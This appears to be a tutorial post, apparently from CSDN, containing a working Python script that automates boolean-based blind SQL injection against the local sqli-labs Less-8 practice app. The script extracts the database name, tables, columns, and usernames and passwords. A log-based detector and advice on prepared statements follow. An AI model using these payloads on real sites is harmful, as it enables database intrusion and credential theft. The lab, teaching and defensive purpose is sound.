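Automating blind injection with a Python script: a Python script for boolean-based blind injection

This Python script automates a SQL blind injection attack: it sends HTTP requests and uses the boolean response to determine the database name, table names, column names, and specific values. The script first obtains the length of the database name by trying different lengths, then retrieves, character by character, the database name, the table names, the column names of the 'users' table, and the values of the 'username' and 'password' columns in the 'users' table.
Summary generated by CSDN using intelligent technology.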

```python
# coding: utf-8

import requests


# Get the length of the database name
def database_len():
    for i in range(1, 10):
        url = '''http://127.0.0.1/sqli-labs/Less-8/index.php'''
        payload = '''?id=1' and length(database())>%s''' % i
        # print(url + payload + '%23')
        r = requests.get(url + payload + '%23')
        # The page shows "You are in" only when the injected condition is true
        if 'You are in' in r.text:
            print(i)
        else:
            # print('false')
            # First i for which length > i is false is the length itself
            print('database_length:', i)
            break


database_len()


# Get the database name
def database_name():
    name = ''
    for j in range(1, 9):
        # MySQL's default collation compares case-insensitively, so an
        # uppercase letter can be reported for a lowercase name
        for i in '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz':
            url = "http://127.0.0.1/sqli-labs/Less-8/index.php?id=1' and substr(database(),%d,1)='%s'" % (
                j, i)
            # print(url + '%23')
            r = requests.get(url + '%23')
            if 'You are in' in r.text:
                name = name + i
                print(name)
                break
    print('database_name:', name)


database_name()


# Get the tables in the database
def tables_name():
    name = ''
    for j in range(1, 30):
        for i in 'abcdefghijklmnopqrstuvwxyz,':
            url = "http://127.0.0.1/sqli-labs/Less-8/index.php?id=1' and substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1)='%s'" % (
                j, i)
            r = requests.get(url + '%23')
            if 'You are in' in r.text:
                name = name + i
                print(name)
                break
    print('table_name:', name)


tables_name()


# Get the columns of the table
def columns_name():
    name = ''
    for j in range(1, 30):
        for i in 'abcdefghijklmnopqrstuvwxyz,':
            url = "http://127.0.0.1/sqli-labs/Less-8/index.php?id=1' and substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),%d,1)='%s'" % (
                j, i)
            r = requests.get(url + '%23')
            if 'You are in' in r.text:
                name = name + i
                print(name)
                break
    print('column_name:', name)


columns_name()


# Get username
def username_value():
    name = ''
    for j in range(1, 100):
        for i in '0123456789abcdefghijklmnopqrstuvwxyz,_-':
            url = "http://127.0.0.1/sqli-labs/Less-8/index.php?id=1' and substr((select group_concat(username) from users),%d,1)='%s'" % (
                j, i)
            r = requests.get(url + '%23')
            if 'You are in' in r.text:
                name = name + i
                print(name)
                break
    print('username_value:', name)


username_value()


# Get password
def password_value():
    name = ''
    for j in range(1, 100):
        for i in '0123456789abcdefghijklmnopqrstuvwxyz,_-':
            url = "http://127.0.0.1/sqli-labs/Less-8/index.php?id=1' and substr((select group_concat(password) from users),%d,1)='%s'" % (
                j, i)
            r = requests.get(url + '%23')
            if 'You are in' in r.text:
                name = name + i
                print(name)
                break
    print('password_value:', name)


password_value()
```
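The script above leaves a distinctive trail in the web server's access log: one client sending many requests whose `id` parameter carries `length(...)>N` or `substr(...,N,1)='c'` probes. The following is an added example, not part of the original post, that flags this pattern; the Apache-style log layout, the `min_probes` threshold, the function names and the sample lines (documentation-range IPs) are all assumptions made for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Probe shapes used by the script above:
#   substr(<expr>,<pos>,1)='<char>'   and   length(<expr>)><n>
PROBE = re.compile(
    r"substr\(.+,\s*(\d+)\s*,\s*1\s*\)\s*=\s*'(.)'|length\(.+\)\s*>\s*(\d+)",
    re.I)
# Assumed log layout (Apache common/combined): ip - - [time] "METHOD target PROTO" ...
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*"')


def find_blind_sqli(lines, min_probes=5):
    """Return {(client, path): stats} for clients that repeat boolean probes."""
    seen = defaultdict(lambda: {"probes": 0, "positions": set()})
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # not an access-log line in the assumed layout
        client, target = m.groups()
        path, _, query = target.partition("?")
        hit = PROBE.search(unquote(query))  # decode %20, %23, ... first
        if not hit:
            continue
        stats = seen[(client, path)]
        stats["probes"] += 1
        if hit.group(1):  # substr probe: remember which character position
            stats["positions"].add(int(hit.group(1)))
    return {k: v for k, v in seen.items() if v["probes"] >= min_probes}


def sample_log():
    """Constructed access-log lines (not real traffic)."""
    fmt = ('{ip} - - [01/Jan/2024:00:00:{s:02d} +0000] '
           '"GET /sqli-labs/Less-8/index.php?id={q} HTTP/1.1" 200 700')
    probes = ["1'%20and%20length(database())>{}%23".format(n) for n in (1, 2)]
    probes += ["1'%20and%20substr(database(),{},1)='{}'%23".format(p, c)
               for p in (1, 2, 3) for c in "abc"]
    lines = [fmt.format(ip="192.0.2.10", s=i, q=q) for i, q in enumerate(probes)]
    # A second client browsing normally with plain numeric ids
    lines += [fmt.format(ip="192.0.2.20", s=30 + i, q=str(i)) for i in range(1, 4)]
    return lines


if __name__ == "__main__":
    for (client, path), stats in find_blind_sqli(sample_log()).items():
        print(client, path, stats["probes"], sorted(stats["positions"]))
```

Detection of this kind complements the fix in the application itself, which is to bind `id` as a parameter in a prepared statement instead of concatenating it into the query.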
